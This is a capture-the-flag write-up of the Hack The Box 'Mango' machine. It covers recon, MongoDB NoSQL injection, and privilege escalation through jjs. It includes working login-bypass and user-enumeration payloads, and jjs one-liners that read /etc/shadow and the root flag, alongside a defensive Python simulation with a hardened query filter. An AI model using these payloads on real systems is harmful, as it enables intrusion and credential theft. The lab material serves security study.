[HTB] Mango — Write-up

Recon

Nmap

$ nmap -Pn --open -sC -sV -p- -T4 10.10.10.162
Updating /etc/hosts
staging-order.mango.htb

Initial Foothold (MongoDB + NoSQL)

NoSQL Injection Attack

Example PoC of NoSQL Injection Exploit (Source: PayloadsAllTheThings)
username[$ne]=admin&password[$ne]=admin&login=login

NoSQL Injection Attack — User Enumeration

### Valid User
username=admin&password[$ne]=password&login=login --> 302 Found
### Invalid User
username=noOne&password[$ne]=password&login=login --> 200 OK
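The oracle above works because the login form hands PHP-style `field[$op]=value` parameters straight to MongoDB, where a `$ne` key is read as an operator instead of a literal. The following Python is an added example, not code from the write-up or from the box: it parses both PoC payloads the way PHP's `$_POST` would, runs them through a deliberately trusting filter builder next to a hardened one, and reproduces the 302-vs-200 difference against a constructed in-memory user list (the user records, the helper names and the password values are all assumptions made for illustration).

```python
"""Added example: why `username[$ne]=admin` becomes a Mongo operator object,
and how a server can detect and neutralise it. All names and sample data are
constructed for this illustration; none of it is the box's real code."""
from typing import Any, Dict, Optional
from urllib.parse import parse_qsl

# Constructed sample records (not the box's data); passwords are placeholders.
USERS = [
    {"username": "admin", "password": "EXAMPLE_ADMIN_PW"},
    {"username": "mango", "password": "EXAMPLE_MANGO_PW"},
]


def parse_php_style(body: str) -> Dict[str, Any]:
    """Emulate PHP's $_POST decoding of `key[sub]=value` pairs.

    `username[$ne]=admin` becomes {'username': {'$ne': 'admin'}}; passed
    unchanged into a Mongo filter, the `$ne` key acts as an operator.
    """
    result: Dict[str, Any] = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key.endswith("]") and "[" in key:
            base, sub = key[:-1].split("[", 1)
            result.setdefault(base, {})[sub] = value
        else:
            result[key] = value
    return result


def contains_operator(value: Any) -> bool:
    """True if any key at any depth starts with '$' (Mongo operator syntax)."""
    if isinstance(value, dict):
        return any(str(k).startswith("$") or contains_operator(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def is_suspicious_body(body: str) -> bool:
    """Request-level detection: flag bodies carrying a `$`-prefixed key."""
    return contains_operator(parse_php_style(body))


def build_filter_vulnerable(params: Dict[str, Any]) -> Dict[str, Any]:
    """'Before' form: trusts the decoded structure, so operators pass through."""
    return {"username": params.get("username"), "password": params.get("password")}


def build_filter_hardened(params: Dict[str, Any]) -> Dict[str, Any]:
    """'After' form: credentials must be plain strings, never objects."""
    username, password = params.get("username"), params.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("credential fields must be plain strings")
    return {"username": username, "password": password}


def _match_field(actual: Any, expected: Any) -> bool:
    """Minimal stand-in for Mongo's matcher: equality plus the `$ne` operator."""
    if isinstance(expected, dict):
        if set(expected) == {"$ne"}:
            return actual != expected["$ne"]
        raise ValueError("operator not modelled in this example")
    return actual == expected


def find_one(filt: Dict[str, Any]) -> Optional[Dict[str, Any]]:
    """Return the first constructed user matching every field of the filter."""
    for doc in USERS:
        if all(_match_field(doc.get(k), v) for k, v in filt.items()):
            return doc
    return None


def login_vulnerable(body: str) -> str:
    """Reproduces the 302-vs-200 oracle: a valid username plus `password[$ne]`
    matches any record whose password differs from the supplied string."""
    doc = find_one(build_filter_vulnerable(parse_php_style(body)))
    return "302 Found" if doc else "200 OK"


def login_hardened(body: str) -> str:
    """Rejects operator objects before they reach the query, so username
    enumeration through `$ne` yields the same response as a bad login."""
    try:
        filt = build_filter_hardened(parse_php_style(body))
    except ValueError:
        return "200 OK"
    return "302 Found" if find_one(filt) else "200 OK"


if __name__ == "__main__":
    for body in ("username=admin&password[$ne]=password&login=login",
                 "username=noOne&password[$ne]=password&login=login"):
        print(body, "->", login_vulnerable(body), "/ hardened:", login_hardened(body))
```

The type check in `build_filter_hardened` is the essential fix; the `contains_operator` walk is the cheap detection hook a WAF or request logger can apply to every body, since legitimate credentials never contain a `$`-prefixed key.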

NoSQL Injection Attack — Extracting Passwords

exploit.py

User Access #1 (mango)

User Access #2 (mango → admin)

Root Access

GTFobins — JJS Exploit

### Reading /etc/shadow File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/etc/shadow"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

root.txt

### Reading /root/root.txt File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

Conclusion

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
